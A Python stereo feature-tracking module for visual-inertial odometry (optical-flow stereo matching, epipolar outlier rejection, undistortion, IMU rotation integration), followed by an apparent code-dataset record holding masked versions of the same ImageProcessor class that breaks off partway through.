cam0_points, cam1_points, **self.config.lk_params)
cam0_points_, _, _ = cv2.calcOpticalFlowPyrLK(
self.curr_cam1_pyramid, self.curr_cam0_pyramid,
cam1_points, cam0_points.copy(), **self.config.lk_params)
err = np.linalg.norm(cam0_points - cam0_points_, axis=1)
# cam1_points_undistorted = self.undistort_points(
# cam1_points, self.cam1_intrinsics,
# self.cam1_distortion_model, self.cam1_distortion_coeffs, R_cam0_cam1)
disparity = np.abs(cam1_points_copy[:, 1] - cam1_points[:, 1])
inlier_markers = np.logical_and.reduce(
[inlier_markers.reshape(-1), err < 3, disparity < 20])
# Mark those tracked points out of the image region as untracked.
img = self.cam1_curr_img_msg.image
for i, point in enumerate(cam1_points):
if not inlier_markers[i]:
continue
if (point[0] < 0 or point[0] > img.shape[1]-1 or
point[1] < 0 or point[1] > img.shape[0]-1):
inlier_markers[i] = 0
# Compute the relative rotation between the cam0 frame and cam1 frame.
t_cam0_cam1 = self.R_cam1_imu.T @ (self.t_cam0_imu - self.t_cam1_imu)
# Compute the essential matrix.
E = skew(t_cam0_cam1) @ R_cam0_cam1
# Further remove outliers based on the known essential matrix.
cam0_points_undistorted = self.undistort_points(
cam0_points, self.cam0_intrinsics,
self.cam0_distortion_model, self.cam0_distortion_coeffs)
cam1_points_undistorted = self.undistort_points(
cam1_points, self.cam1_intrinsics,
self.cam1_distortion_model, self.cam1_distortion_coeffs)
norm_pixel_unit = 4.0 / (
self.cam0_intrinsics[0] + self.cam0_intrinsics[1] +
self.cam1_intrinsics[0] + self.cam1_intrinsics[1])
for i in range(len(cam0_points_undistorted)):
if not inlier_markers[i]:
continue
pt0 = np.array([*cam0_points_undistorted[i], 1.0])
pt1 = np.array([*cam1_points_undistorted[i], 1.0])
epipolar_line = E @ pt0
error = np.abs((pt1 * epipolar_line)[0]) / np.linalg.norm(
epipolar_line[:2])
if error > self.config.stereo_threshold * norm_pixel_unit:
inlier_markers[i] = 0
return cam1_points, inlier_markers
def undistort_points(self, pts_in, intrinsics, distortion_model,
distortion_coeffs, rectification_matrix=np.identity(3),
new_intrinsics=np.array([1, 1, 0, 0])):
"""
Arguments:
pts_in: points to be undistorted.
intrinsics: intrinsics of the camera.
distortion_model: distortion model of the camera.
distortion_coeffs: distortion coefficients.
rectification_matrix:
new_intrinsics:
Returns:
pts_out: undistorted points.
"""
if len(pts_in) == 0:
return []
pts_in = np.reshape(pts_in, (-1, 1, 2))
K = np.array([
[intrinsics[0], 0.0, intrinsics[2]],
[0.0, intrinsics[1], intrinsics[3]],
[0.0, 0.0, 1.0]])
K_new = np.array([
[new_intrinsics[0], 0.0, new_intrinsics[2]],
[0.0, new_intrinsics[1], new_intrinsics[3]],
[0.0, 0.0, 1.0]])
if distortion_model == 'equidistant':
pts_out = cv2.fisheye.undistortPoints(pts_in, K, distortion_coeffs,
rectification_matrix, K_new)
else: # default: 'radtan'
pts_out = cv2.undistortPoints(pts_in, K, distortion_coeffs, None,
rectification_matrix, K_new)
return pts_out.reshape((-1, 2))
def distort_points(self, pts_in, intrinsics, distortion_model,
distortion_coeffs):
"""
Arguments:
pts_in: points to be distorted.
intrinsics: intrinsics of the camera.
distortion_model: distortion model of the camera.
distortion_coeffs: distortion coefficients.
Returns:
pts_out: distorted points. (N, 2)
"""
if len(pts_in) == 0:
return []
K = np.array([
[intrinsics[0], 0.0, intrinsics[2]],
[0.0, intrinsics[1], intrinsics[3]],
[0.0, 0.0, 1.0]])
if distortion_model == 'equidistant':
pts_out = cv2.fisheye.distortPoints(pts_in, K, distortion_coeffs)
else: # default: 'radtan'
homogenous_pts = cv2.convertPointsToHomogeneous(pts_in)
pts_out, _ = cv2.projectPoints(homogenous_pts,
np.zeros(3), np.zeros(3), K, distortion_coeffs)
return pts_out.reshape((-1, 2))
def draw_features_stereo(self):
img0 = self.cam0_curr_img_msg.image
img1 = self.cam1_curr_img_msg.image
kps0 = []
kps1 = []
matches = []
for feature in chain.from_iterable(self.curr_features):
matches.append(cv2.DMatch(len(kps0), len(kps0), 0))
kps0.append(cv2.KeyPoint(*feature.cam0_point, 1))
kps1.append(cv2.KeyPoint(*feature.cam1_point, 1))
img = cv2.drawMatches(img0, kps0, img1, kps1, matches, None, flags=2)
cv2.imshow('stereo features', img)
cv2.waitKey(1)
def skew(vec):
x, y, z = vec
return np.array([
[0, -z, y],
[z, 0, -x],
[-y, x, 0]])
def select(data, selectors):
return [d for d, s in zip(data, selectors) if s]
|
flexible
|
{
"blob_id": "02f196623907703255bf149db0435104d086da97",
"index": 8292,
"step-1": "<mask token>\n\n\nclass ImageProcessor(object):\n <mask token>\n\n def __init__(self, config):\n self.config = config\n self.is_first_img = True\n self.next_feature_id = 0\n self.detector = cv2.FastFeatureDetector_create(self.config.\n fast_threshold)\n self.imu_msg_buffer = []\n self.cam0_prev_img_msg = None\n self.cam0_curr_img_msg = None\n self.cam1_curr_img_msg = None\n self.prev_cam0_pyramid = None\n self.curr_cam0_pyramid = None\n self.curr_cam1_pyramid = None\n self.prev_features = [[] for _ in range(self.config.grid_num)]\n self.curr_features = [[] for _ in range(self.config.grid_num)]\n self.num_features = defaultdict(int)\n self.cam0_resolution = config.cam0_resolution\n self.cam0_intrinsics = config.cam0_intrinsics\n self.cam0_distortion_model = config.cam0_distortion_model\n self.cam0_distortion_coeffs = config.cam0_distortion_coeffs\n self.cam1_resolution = config.cam1_resolution\n self.cam1_intrinsics = config.cam1_intrinsics\n self.cam1_distortion_model = config.cam1_distortion_model\n self.cam1_distortion_coeffs = config.cam1_distortion_coeffs\n self.T_cam0_imu = np.linalg.inv(config.T_imu_cam0)\n self.R_cam0_imu = self.T_cam0_imu[:3, :3]\n self.t_cam0_imu = self.T_cam0_imu[:3, 3]\n self.T_cam1_imu = np.linalg.inv(config.T_imu_cam1)\n self.R_cam1_imu = self.T_cam1_imu[:3, :3]\n self.t_cam1_imu = self.T_cam1_imu[:3, 3]\n self.image_id = 0\n\n def stereo_callback(self, stereo_msg):\n \"\"\"\n Callback function for the stereo images.\n \"\"\"\n start = time.time()\n self.cam0_curr_img_msg = stereo_msg.cam0_msg\n self.cam1_curr_img_msg = stereo_msg.cam1_msg\n self.create_image_pyramids()\n if self.is_first_img:\n if not self.config.load_features_flag:\n self.initialize_first_frame()\n self.is_first_img = False\n elif not self.config.load_features_flag:\n t = time.time()\n self.track_features()\n print('___track_features:', time.time() - t)\n t = time.time()\n self.add_new_features()\n print('___add_new_features:', time.time() - t)\n t = time.time()\n self.prune_features()\n print('___prune_features:', time.time() - t)\n t = time.time()\n print('___draw_features_stereo:', time.time() - t)\n t = time.time()\n print('===image process elapsed:', time.time() - start,\n f'({stereo_msg.timestamp})')\n if not self.config.load_features_flag:\n try:\n self.save_features()\n return self.publish()\n finally:\n self.cam0_prev_img_msg = self.cam0_curr_img_msg\n self.prev_features = self.curr_features\n self.prev_cam0_pyramid = self.curr_cam0_pyramid\n self.curr_features = [[] for _ in range(self.config.grid_num)]\n else:\n self.load_features()\n return self.publish()\n\n def imu_callback(self, msg):\n \"\"\"\n Callback function for the imu message.\n \"\"\"\n self.imu_msg_buffer.append(msg)\n\n def create_image_pyramids(self):\n \"\"\"\n Create image pyramids used for KLT tracking.\n (Seems doesn't work in python)\n \"\"\"\n curr_cam0_img = self.cam0_curr_img_msg.image\n self.curr_cam0_pyramid = curr_cam0_img\n curr_cam1_img = self.cam1_curr_img_msg.image\n self.curr_cam1_pyramid = curr_cam1_img\n\n def initialize_first_frame(self):\n \"\"\"\n Initialize the image processing sequence, which is basically detect \n new features on the first set of stereo images.\n \"\"\"\n img = self.cam0_curr_img_msg.image\n grid_height, grid_width = self.get_grid_size(img)\n new_features = self.detector.detect(img)\n cam0_points = [kp.pt for kp in new_features]\n cam1_points, inlier_markers = self.stereo_match(cam0_points)\n cam0_inliers, cam1_inliers = [], []\n response_inliers = []\n for i, inlier in enumerate(inlier_markers):\n if not inlier:\n continue\n cam0_inliers.append(cam0_points[i])\n cam1_inliers.append(cam1_points[i])\n response_inliers.append(new_features[i].response)\n grid_new_features = [[] for _ in range(self.config.grid_num)]\n for i in range(len(cam0_inliers)):\n cam0_point = cam0_inliers[i]\n cam1_point = cam1_inliers[i]\n response = response_inliers[i]\n row = int(cam0_point[1] / grid_height)\n col = int(cam0_point[0] / grid_width)\n code = row * self.config.grid_col + col\n new_feature = FeatureMetaData()\n new_feature.response = response\n new_feature.cam0_point = cam0_point\n new_feature.cam1_point = cam1_point\n grid_new_features[code].append(new_feature)\n for i, new_features in enumerate(grid_new_features):\n for feature in sorted(new_features, key=lambda x: x.response,\n reverse=True)[:self.config.grid_min_feature_num]:\n self.curr_features[i].append(feature)\n self.curr_features[i][-1].id = self.next_feature_id\n self.curr_features[i][-1].lifetime = 1\n self.next_feature_id += 1\n\n def track_features(self):\n \"\"\"\n Tracker features on the newly received stereo images.\n \"\"\"\n img = self.cam0_curr_img_msg.image\n grid_height, grid_width = self.get_grid_size(img)\n cam0_R_p_c, cam1_R_p_c = self.integrate_imu_data()\n prev_ids = []\n prev_lifetime = []\n prev_cam0_points = []\n prev_cam1_points = []\n for feature in chain.from_iterable(self.prev_features):\n prev_ids.append(feature.id)\n prev_lifetime.append(feature.lifetime)\n prev_cam0_points.append(feature.cam0_point)\n prev_cam1_points.append(feature.cam1_point)\n prev_cam0_points = np.array(prev_cam0_points, dtype=np.float32)\n self.num_features['before_tracking'] = len(prev_cam0_points)\n if len(prev_cam0_points) == 0:\n return\n curr_cam0_points = self.predict_feature_tracking(prev_cam0_points,\n cam0_R_p_c, self.cam0_intrinsics)\n curr_cam0_points, track_inliers, _ = cv2.calcOpticalFlowPyrLK(self.\n prev_cam0_pyramid, self.curr_cam0_pyramid, prev_cam0_points.\n astype(np.float32), curr_cam0_points.astype(np.float32), **self\n .config.lk_params)\n for i, point in enumerate(curr_cam0_points):\n if not track_inliers[i]:\n continue\n if point[0] < 0 or point[0] > img.shape[1] - 1 or point[1\n ] < 0 or point[1] > img.shape[0] - 1:\n track_inliers[i] = 0\n prev_tracked_ids = select(prev_ids, track_inliers)\n prev_tracked_lifetime = select(prev_lifetime, track_inliers)\n prev_tracked_cam0_points = select(prev_cam0_points, track_inliers)\n prev_tracked_cam1_points = select(prev_cam1_points, track_inliers)\n curr_tracked_cam0_points = select(curr_cam0_points, track_inliers)\n self.num_features['after_tracking'] = len(curr_tracked_cam0_points)\n curr_cam1_points, match_inliers = self.stereo_match(\n curr_tracked_cam0_points)\n prev_matched_ids = select(prev_tracked_ids, match_inliers)\n prev_matched_lifetime = select(prev_tracked_lifetime, match_inliers)\n prev_matched_cam0_points = select(prev_tracked_cam0_points,\n match_inliers)\n prev_matched_cam1_points = select(prev_tracked_cam1_points,\n match_inliers)\n curr_matched_cam0_points = select(curr_tracked_cam0_points,\n match_inliers)\n curr_matched_cam1_points = select(curr_cam1_points, match_inliers)\n self.num_features['after_matching'] = len(curr_matched_cam0_points)\n cam0_ransac_inliers = [1] * len(prev_matched_cam0_points)\n cam1_ransac_inliers = [1] * len(prev_matched_cam1_points)\n after_ransac = 0\n for i in range(len(cam0_ransac_inliers)):\n if not (cam0_ransac_inliers[i] and cam1_ransac_inliers[i]):\n continue\n row = int(curr_matched_cam0_points[i][1] / grid_height)\n col = int(curr_matched_cam0_points[i][0] / grid_width)\n code = row * self.config.grid_col + col\n grid_new_feature = FeatureMetaData()\n grid_new_feature.id = prev_matched_ids[i]\n grid_new_feature.lifetime = prev_matched_lifetime[i] + 1\n grid_new_feature.cam0_point = curr_matched_cam0_points[i]\n grid_new_feature.cam1_point = curr_matched_cam1_points[i]\n prev_matched_lifetime[i] += 1\n self.curr_features[code].append(grid_new_feature)\n after_ransac += 1\n self.num_features['after_ransac'] = after_ransac\n\n def add_new_features(self):\n \"\"\"\n Detect new features on the image to ensure that the features are \n uniformly distributed on the image.\n \"\"\"\n curr_img = self.cam0_curr_img_msg.image\n grid_height, grid_width = self.get_grid_size(curr_img)\n mask = np.ones(curr_img.shape[:2], dtype='uint8')\n for feature in chain.from_iterable(self.curr_features):\n x, y = map(int, feature.cam0_point)\n mask[y - 3:y + 4, x - 3:x + 4] = 0\n new_features = self.detector.detect(curr_img, mask=mask)\n new_feature_sieve = [[] for _ in range(self.config.grid_num)]\n for feature in new_features:\n row = int(feature.pt[1] / grid_height)\n col = int(feature.pt[0] / grid_width)\n code = row * self.config.grid_col + col\n new_feature_sieve[code].append(feature)\n new_features = []\n for features in new_feature_sieve:\n if len(features) > self.config.grid_max_feature_num:\n features = sorted(features, key=lambda x: x.response,\n reverse=True)[:self.config.grid_max_feature_num]\n new_features.append(features)\n new_features = list(chain.from_iterable(new_features))\n cam0_points = [kp.pt for kp in new_features]\n cam1_points, inlier_markers = self.stereo_match(cam0_points)\n cam0_inliers, cam1_inliers, response_inliers = [], [], []\n for i, inlier in enumerate(inlier_markers):\n if not inlier:\n continue\n cam0_inliers.append(cam0_points[i])\n cam1_inliers.append(cam1_points[i])\n response_inliers.append(new_features[i].response)\n grid_new_features = [[] for _ in range(self.config.grid_num)]\n for i in range(len(cam0_inliers)):\n cam0_point = cam0_inliers[i]\n cam1_point = cam1_inliers[i]\n response = response_inliers[i]\n row = int(cam0_point[1] / grid_height)\n col = int(cam0_point[0] / grid_width)\n code = row * self.config.grid_col + col\n new_feature = FeatureMetaData()\n new_feature.response = response\n new_feature.cam0_point = cam0_point\n new_feature.cam1_point = cam1_point\n grid_new_features[code].append(new_feature)\n for i, new_features in enumerate(grid_new_features):\n for feature in sorted(new_features, key=lambda x: x.response,\n reverse=True)[:self.config.grid_min_feature_num]:\n self.curr_features[i].append(feature)\n self.curr_features[i][-1].id = self.next_feature_id\n self.curr_features[i][-1].lifetime = 1\n self.next_feature_id += 1\n\n def prune_features(self):\n \"\"\"\n Remove some of the features of a grid in case there are too many \n features inside of that grid, which ensures the number of features \n within each grid is bounded.\n \"\"\"\n for i, features in enumerate(self.curr_features):\n if len(features) <= self.config.grid_max_feature_num:\n continue\n self.curr_features[i] = sorted(features, key=lambda x: x.\n lifetime, reverse=True)[:self.config.grid_max_feature_num]\n <mask token>\n\n def save_features(self):\n filename = self.config.result_dir + str(self.image_id) + '.npz'\n np.savez(filename, self.curr_features)\n self.image_id += 1\n <mask token>\n\n def integrate_imu_data(self):\n \"\"\"\n Integrates the IMU gyro readings between the two consecutive images, \n which is used for both tracking prediction and 2-point RANSAC.\n\n Returns:\n cam0_R_p_c: a rotation matrix which takes a vector from previous \n cam0 frame to current cam0 frame.\n cam1_R_p_c: a rotation matrix which takes a vector from previous \n cam1 frame to current cam1 frame.\n \"\"\"\n idx_begin = None\n for i, msg in enumerate(self.imu_msg_buffer):\n if msg.timestamp >= self.cam0_prev_img_msg.timestamp - 0.01:\n idx_begin = i\n break\n idx_end = None\n for i, msg in enumerate(self.imu_msg_buffer):\n if msg.timestamp >= self.cam0_curr_img_msg.timestamp - 0.004:\n idx_end = i\n break\n if idx_begin is None or idx_end is None:\n return np.identity(3), np.identity(3)\n mean_ang_vel = np.zeros(3)\n for i in range(idx_begin, idx_end):\n mean_ang_vel += self.imu_msg_buffer[i].angular_velocity\n if idx_end > idx_begin:\n mean_ang_vel /= idx_end - idx_begin\n cam0_mean_ang_vel = self.R_cam0_imu.T @ mean_ang_vel\n cam1_mean_ang_vel = self.R_cam1_imu.T @ mean_ang_vel\n dt = (self.cam0_curr_img_msg.timestamp - self.cam0_prev_img_msg.\n timestamp)\n cam0_R_p_c = cv2.Rodrigues(cam0_mean_ang_vel * dt)[0].T\n cam1_R_p_c = cv2.Rodrigues(cam1_mean_ang_vel * dt)[0].T\n self.imu_msg_buffer = self.imu_msg_buffer[idx_end:]\n return cam0_R_p_c, cam1_R_p_c\n\n def rescale_points(self, pts1, pts2):\n \"\"\"\n Arguments:\n pts1: first set of points.\n pts2: second set of points.\n\n Returns:\n pts1: scaled first set of points.\n pts2: scaled second set of points.\n scaling_factor: scaling factor\n \"\"\"\n scaling_factor = 0\n for pt1, pt2 in zip(pts1, pts2):\n scaling_factor += np.linalg.norm(pt1)\n scaling_factor += np.linalg.norm(pt2)\n scaling_factor = (len(pts1) + len(pts2)) / scaling_factor * np.sqrt(2)\n for i in range(len(pts1)):\n pts1[i] *= scaling_factor\n pts2[i] *= scaling_factor\n return pts1, pts2, scaling_factor\n\n def get_grid_size(self, img):\n \"\"\"\n # Size of each grid.\n \"\"\"\n grid_height = int(np.ceil(img.shape[0] / self.config.grid_row))\n grid_width = int(np.ceil(img.shape[1] / self.config.grid_col))\n return grid_height, grid_width\n\n def predict_feature_tracking(self, input_pts, R_p_c, intrinsics):\n \"\"\"\n predictFeatureTracking Compensates the rotation between consecutive \n camera frames so that feature tracking would be more robust and fast.\n\n Arguments:\n input_pts: features in the previous image to be tracked.\n R_p_c: a rotation matrix takes a vector in the previous camera \n frame to the current camera frame. (matrix33)\n intrinsics: intrinsic matrix of the camera. (vec3)\n\n Returns:\n compensated_pts: predicted locations of the features in the \n current image based on the provided rotation.\n \"\"\"\n if len(input_pts) == 0:\n return []\n K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics\n [1], intrinsics[3]], [0.0, 0.0, 1.0]])\n H = K @ R_p_c @ np.linalg.inv(K)\n compensated_pts = []\n for i in range(len(input_pts)):\n p1 = np.array([*input_pts[i], 1.0])\n p2 = H @ p1\n compensated_pts.append(p2[:2] / p2[2])\n return np.array(compensated_pts, dtype=np.float32)\n\n def stereo_match(self, cam0_points):\n \"\"\"\n Matches features with stereo image pairs.\n\n Arguments:\n cam0_points: points in the primary image.\n\n Returns:\n cam1_points: points in the secondary image.\n inlier_markers: 1 if the match is valid, 0 otherwise.\n \"\"\"\n cam0_points = np.array(cam0_points)\n if len(cam0_points) == 0:\n return []\n R_cam0_cam1 = self.R_cam1_imu.T @ self.R_cam0_imu\n cam0_points_undistorted = self.undistort_points(cam0_points, self.\n cam0_intrinsics, self.cam0_distortion_model, self.\n cam0_distortion_coeffs, R_cam0_cam1)\n cam1_points = self.distort_points(cam0_points_undistorted, self.\n cam1_intrinsics, self.cam1_distortion_model, self.\n cam1_distortion_coeffs)\n cam1_points_copy = cam1_points.copy()\n cam0_points = cam0_points.astype(np.float32)\n cam1_points = cam1_points.astype(np.float32)\n cam1_points, inlier_markers, _ = cv2.calcOpticalFlowPyrLK(self.\n curr_cam0_pyramid, self.curr_cam1_pyramid, cam0_points,\n cam1_points, **self.config.lk_params)\n cam0_points_, _, _ = cv2.calcOpticalFlowPyrLK(self.\n curr_cam1_pyramid, self.curr_cam0_pyramid, cam1_points,\n cam0_points.copy(), **self.config.lk_params)\n err = np.linalg.norm(cam0_points - cam0_points_, axis=1)\n disparity = np.abs(cam1_points_copy[:, 1] - cam1_points[:, 1])\n inlier_markers = np.logical_and.reduce([inlier_markers.reshape(-1),\n err < 3, disparity < 20])\n img = self.cam1_curr_img_msg.image\n for i, point in enumerate(cam1_points):\n if not inlier_markers[i]:\n continue\n if point[0] < 0 or point[0] > img.shape[1] - 1 or point[1\n ] < 0 or point[1] > img.shape[0] - 1:\n inlier_markers[i] = 0\n t_cam0_cam1 = self.R_cam1_imu.T @ (self.t_cam0_imu - self.t_cam1_imu)\n E = skew(t_cam0_cam1) @ R_cam0_cam1\n cam0_points_undistorted = self.undistort_points(cam0_points, self.\n cam0_intrinsics, self.cam0_distortion_model, self.\n cam0_distortion_coeffs)\n cam1_points_undistorted = self.undistort_points(cam1_points, self.\n cam1_intrinsics, self.cam1_distortion_model, self.\n cam1_distortion_coeffs)\n norm_pixel_unit = 4.0 / (self.cam0_intrinsics[0] + self.\n cam0_intrinsics[1] + self.cam1_intrinsics[0] + self.\n cam1_intrinsics[1])\n for i in range(len(cam0_points_undistorted)):\n if not inlier_markers[i]:\n continue\n pt0 = np.array([*cam0_points_undistorted[i], 1.0])\n pt1 = np.array([*cam1_points_undistorted[i], 1.0])\n epipolar_line = E @ pt0\n error = np.abs((pt1 * epipolar_line)[0]) / np.linalg.norm(\n epipolar_line[:2])\n if error > self.config.stereo_threshold * norm_pixel_unit:\n inlier_markers[i] = 0\n return cam1_points, inlier_markers\n\n def undistort_points(self, pts_in, intrinsics, distortion_model,\n distortion_coeffs, rectification_matrix=np.identity(3),\n new_intrinsics=np.array([1, 1, 0, 0])):\n \"\"\"\n Arguments:\n pts_in: points to be undistorted.\n intrinsics: intrinsics of the camera.\n distortion_model: distortion model of the camera.\n distortion_coeffs: distortion coefficients.\n rectification_matrix:\n new_intrinsics:\n\n Returns:\n pts_out: undistorted points.\n \"\"\"\n if len(pts_in) == 0:\n return []\n pts_in = np.reshape(pts_in, (-1, 1, 2))\n K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics\n [1], intrinsics[3]], [0.0, 0.0, 1.0]])\n K_new = np.array([[new_intrinsics[0], 0.0, new_intrinsics[2]], [0.0,\n new_intrinsics[1], new_intrinsics[3]], [0.0, 0.0, 1.0]])\n if distortion_model == 'equidistant':\n pts_out = cv2.fisheye.undistortPoints(pts_in, K,\n distortion_coeffs, rectification_matrix, K_new)\n else:\n pts_out = cv2.undistortPoints(pts_in, K, distortion_coeffs,\n None, rectification_matrix, K_new)\n return pts_out.reshape((-1, 2))\n\n def distort_points(self, pts_in, intrinsics, distortion_model,\n distortion_coeffs):\n \"\"\"\n Arguments:\n pts_in: points to be distorted.\n intrinsics: intrinsics of the camera.\n distortion_model: distortion model of the camera.\n distortion_coeffs: distortion coefficients.\n\n Returns:\n pts_out: distorted points. (N, 2)\n \"\"\"\n if len(pts_in) == 0:\n return []\n K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics\n [1], intrinsics[3]], [0.0, 0.0, 1.0]])\n if distortion_model == 'equidistant':\n pts_out = cv2.fisheye.distortPoints(pts_in, K, distortion_coeffs)\n else:\n homogenous_pts = cv2.convertPointsToHomogeneous(pts_in)\n pts_out, _ = cv2.projectPoints(homogenous_pts, np.zeros(3), np.\n zeros(3), K, distortion_coeffs)\n return pts_out.reshape((-1, 2))\n\n def draw_features_stereo(self):\n img0 = self.cam0_curr_img_msg.image\n img1 = self.cam1_curr_img_msg.image\n kps0 = []\n kps1 = []\n matches = []\n for feature in chain.from_iterable(self.curr_features):\n matches.append(cv2.DMatch(len(kps0), len(kps0), 0))\n kps0.append(cv2.KeyPoint(*feature.cam0_point, 1))\n kps1.append(cv2.KeyPoint(*feature.cam1_point, 1))\n img = cv2.drawMatches(img0, kps0, img1, kps1, matches, None, flags=2)\n cv2.imshow('stereo features', img)\n cv2.waitKey(1)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ImageProcessor(object):\n <mask token>\n\n def __init__(self, config):\n self.config = config\n self.is_first_img = True\n self.next_feature_id = 0\n self.detector = cv2.FastFeatureDetector_create(self.config.\n fast_threshold)\n self.imu_msg_buffer = []\n self.cam0_prev_img_msg = None\n self.cam0_curr_img_msg = None\n self.cam1_curr_img_msg = None\n self.prev_cam0_pyramid = None\n self.curr_cam0_pyramid = None\n self.curr_cam1_pyramid = None\n self.prev_features = [[] for _ in range(self.config.grid_num)]\n self.curr_features = [[] for _ in range(self.config.grid_num)]\n self.num_features = defaultdict(int)\n self.cam0_resolution = config.cam0_resolution\n self.cam0_intrinsics = config.cam0_intrinsics\n self.cam0_distortion_model = config.cam0_distortion_model\n self.cam0_distortion_coeffs = config.cam0_distortion_coeffs\n self.cam1_resolution = config.cam1_resolution\n self.cam1_intrinsics = config.cam1_intrinsics\n self.cam1_distortion_model = config.cam1_distortion_model\n self.cam1_distortion_coeffs = config.cam1_distortion_coeffs\n self.T_cam0_imu = np.linalg.inv(config.T_imu_cam0)\n self.R_cam0_imu = self.T_cam0_imu[:3, :3]\n self.t_cam0_imu = self.T_cam0_imu[:3, 3]\n self.T_cam1_imu = np.linalg.inv(config.T_imu_cam1)\n self.R_cam1_imu = self.T_cam1_imu[:3, :3]\n self.t_cam1_imu = self.T_cam1_imu[:3, 3]\n self.image_id = 0\n\n def stereo_callback(self, stereo_msg):\n \"\"\"\n Callback function for the stereo images.\n \"\"\"\n start = time.time()\n self.cam0_curr_img_msg = stereo_msg.cam0_msg\n self.cam1_curr_img_msg = stereo_msg.cam1_msg\n self.create_image_pyramids()\n if self.is_first_img:\n if not self.config.load_features_flag:\n self.initialize_first_frame()\n self.is_first_img = False\n elif not self.config.load_features_flag:\n t = time.time()\n self.track_features()\n print('___track_features:', time.time() - t)\n t = time.time()\n self.add_new_features()\n print('___add_new_features:', time.time() - t)\n t = time.time()\n self.prune_features()\n print('___prune_features:', time.time() - t)\n t = time.time()\n print('___draw_features_stereo:', time.time() - t)\n t = time.time()\n print('===image process elapsed:', time.time() - start,\n f'({stereo_msg.timestamp})')\n if not self.config.load_features_flag:\n try:\n self.save_features()\n return self.publish()\n finally:\n self.cam0_prev_img_msg = self.cam0_curr_img_msg\n self.prev_features = self.curr_features\n self.prev_cam0_pyramid = self.curr_cam0_pyramid\n self.curr_features = [[] for _ in range(self.config.grid_num)]\n else:\n self.load_features()\n return self.publish()\n\n def imu_callback(self, msg):\n \"\"\"\n Callback function for the imu message.\n \"\"\"\n self.imu_msg_buffer.append(msg)\n\n def create_image_pyramids(self):\n \"\"\"\n Create image pyramids used for KLT tracking.\n (Seems doesn't work in python)\n \"\"\"\n curr_cam0_img = self.cam0_curr_img_msg.image\n self.curr_cam0_pyramid = curr_cam0_img\n curr_cam1_img = self.cam1_curr_img_msg.image\n self.curr_cam1_pyramid = curr_cam1_img\n\n def initialize_first_frame(self):\n \"\"\"\n Initialize the image processing sequence, which is basically detect \n new features on the first set of stereo images.\n \"\"\"\n img = self.cam0_curr_img_msg.image\n grid_height, grid_width = self.get_grid_size(img)\n new_features = self.detector.detect(img)\n cam0_points = [kp.pt for kp in new_features]\n cam1_points, inlier_markers = self.stereo_match(cam0_points)\n cam0_inliers, cam1_inliers = [], []\n response_inliers = []\n for i, inlier in enumerate(inlier_markers):\n if not inlier:\n continue\n cam0_inliers.append(cam0_points[i])\n cam1_inliers.append(cam1_points[i])\n response_inliers.append(new_features[i].response)\n grid_new_features = [[] for _ in range(self.config.grid_num)]\n for i in range(len(cam0_inliers)):\n cam0_point = cam0_inliers[i]\n cam1_point = cam1_inliers[i]\n response = response_inliers[i]\n row = int(cam0_point[1] / grid_height)\n col = int(cam0_point[0] / grid_width)\n code = row * self.config.grid_col + col\n new_feature = FeatureMetaData()\n new_feature.response = response\n new_feature.cam0_point = cam0_point\n new_feature.cam1_point = cam1_point\n grid_new_features[code].append(new_feature)\n for i, new_features in enumerate(grid_new_features):\n for feature in sorted(new_features, key=lambda x: x.response,\n reverse=True)[:self.config.grid_min_feature_num]:\n self.curr_features[i].append(feature)\n self.curr_features[i][-1].id = self.next_feature_id\n self.curr_features[i][-1].lifetime = 1\n self.next_feature_id += 1\n\n def track_features(self):\n \"\"\"\n Tracker features on the newly received stereo images.\n \"\"\"\n img = self.cam0_curr_img_msg.image\n grid_height, grid_width = self.get_grid_size(img)\n cam0_R_p_c, cam1_R_p_c = self.integrate_imu_data()\n prev_ids = []\n prev_lifetime = []\n prev_cam0_points = []\n prev_cam1_points = []\n for feature in chain.from_iterable(self.prev_features):\n prev_ids.append(feature.id)\n prev_lifetime.append(feature.lifetime)\n prev_cam0_points.append(feature.cam0_point)\n prev_cam1_points.append(feature.cam1_point)\n prev_cam0_points = np.array(prev_cam0_points, dtype=np.float32)\n self.num_features['before_tracking'] = len(prev_cam0_points)\n if len(prev_cam0_points) == 0:\n return\n curr_cam0_points = self.predict_feature_tracking(prev_cam0_points,\n cam0_R_p_c, self.cam0_intrinsics)\n curr_cam0_points, track_inliers, _ = cv2.calcOpticalFlowPyrLK(self.\n prev_cam0_pyramid, self.curr_cam0_pyramid, prev_cam0_points.\n astype(np.float32), curr_cam0_points.astype(np.float32), **self\n .config.lk_params)\n for i, point in enumerate(curr_cam0_points):\n if not track_inliers[i]:\n continue\n if point[0] < 0 or point[0] > img.shape[1] - 1 or point[1\n ] < 0 or point[1] > img.shape[0] - 1:\n track_inliers[i] = 0\n prev_tracked_ids = select(prev_ids, track_inliers)\n prev_tracked_lifetime = select(prev_lifetime, track_inliers)\n prev_tracked_cam0_points = select(prev_cam0_points, track_inliers)\n prev_tracked_cam1_points = select(prev_cam1_points, track_inliers)\n curr_tracked_cam0_points = select(curr_cam0_points, track_inliers)\n self.num_features['after_tracking'] = len(curr_tracked_cam0_points)\n curr_cam1_points, match_inliers = self.stereo_match(\n curr_tracked_cam0_points)\n prev_matched_ids = select(prev_tracked_ids, match_inliers)\n prev_matched_lifetime = select(prev_tracked_lifetime, match_inliers)\n prev_matched_cam0_points = select(prev_tracked_cam0_points,\n match_inliers)\n prev_matched_cam1_points = select(prev_tracked_cam1_points,\n match_inliers)\n curr_matched_cam0_points = select(curr_tracked_cam0_points,\n match_inliers)\n curr_matched_cam1_points = select(curr_cam1_points, match_inliers)\n self.num_features['after_matching'] = len(curr_matched_cam0_points)\n cam0_ransac_inliers = [1] * len(prev_matched_cam0_points)\n cam1_ransac_inliers = [1] * len(prev_matched_cam1_points)\n after_ransac = 0\n for i in range(len(cam0_ransac_inliers)):\n if not (cam0_ransac_inliers[i] and cam1_ransac_inliers[i]):\n continue\n row = int(curr_matched_cam0_points[i][1] / grid_height)\n col = int(curr_matched_cam0_points[i][0] / grid_width)\n code = row * self.config.grid_col + col\n grid_new_feature = FeatureMetaData()\n grid_new_feature.id = prev_matched_ids[i]\n grid_new_feature.lifetime = prev_matched_lifetime[i] + 1\n grid_new_feature.cam0_point = curr_matched_cam0_points[i]\n grid_new_feature.cam1_point = curr_matched_cam1_points[i]\n prev_matched_lifetime[i] += 1\n self.curr_features[code].append(grid_new_feature)\n 